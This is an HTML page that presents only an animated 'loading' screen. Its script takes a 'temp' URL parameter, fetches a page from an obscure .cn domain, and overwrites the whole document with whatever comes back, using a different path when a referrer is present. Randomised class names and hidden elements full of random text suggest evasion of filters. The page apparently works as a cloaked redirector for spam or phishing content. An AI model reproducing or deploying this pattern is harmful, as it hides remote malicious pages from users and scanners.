<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .MKvPk4 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .MKvPk4 .YuJtOW7fb {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .MKvPk4 .content {
            line-height: 50px;
            text-align: center
        }

        .MKvPk4 .img {
            width: 100%
        }

        .MKvPk4 .q1IhKF {
            text-align: center
        }

        .MKvPk4 .q1IhKF span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .MKvPk4 .q1IhKF span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .MKvPk4 .q1IhKF span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .MKvPk4 .q1IhKF span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .MKvPk4 .q1IhKF span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .MKvPk4 .q1IhKF span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .MKvPk4 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function BEygBBRrKu9Kh(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var uNuhf = BEygBBRrKu9Kh('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ uNuhf +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ uNuhf +".html?a=share";
		}
		
        BuNnRUG9d=url+"#"+new Date().getTime();
        BuNnRUG9d && function() {
            $.get(BuNnRUG9d, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>LBLO67qJKcgXGxTkztKV6gqnDwGju9RQvGNxFp13wbbFOq7SPZ3KTxP9nW8POFwdKtTzymOdWbqcxJenCc</div>
<span style='display:none'>yYKkio7O7c3MClKbhCi47ZMt7vYLvWToXGT5znQyWpq52zpz9J8K</span>
<a  href='#' style='display:none'>LTQBNiBTzVLJiORMBdS0mTauPv2tubz9xUqd50iK2KvimcCAvmwLnRg8Mz2cCVxVSNuCvJSux9jQTT</a>
<p  style='display:none'>MMnIOhH0Zqu49qulV5nUG1fkwWqL1bRZ3mrg8vWxOIVwc896zAH9DFrrLadTGqHH</p>
<h1 style='display:none' >eivxFPkOSjN9CYmkRE0Emsr0PJ05muZR8B4t5ifGwqowIBiVP58t8szT4q0QXyCy54LyVeX</h1><div class="MKvPk4">
    <div class="YuJtOW7fb">
        <div class="q1IhKF">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>ER2QS9KP9CgIN0A6y1bIBAFZnK1hBphnvfktis1ghzq5JGuYFydrK0vwNFZQ7UMQum3m</a>
<h1 style='display:none' >ng1FctX0rOIRC17xUbMvcZjdQHbkNjmuo7LeAGt9nhF0RAtUBivhl0RuQYOHZKAJXB8ebSJ9xqpEmBCyXRspABDWCSzj9G</h1>
<b style='display:none' >xb8PogiQOijbLNQpN69yPu2I4ZgHbjWjFrEAnUbxWxn5HRgK6PIARCjJN8EQnUJUL</b></body>
</html>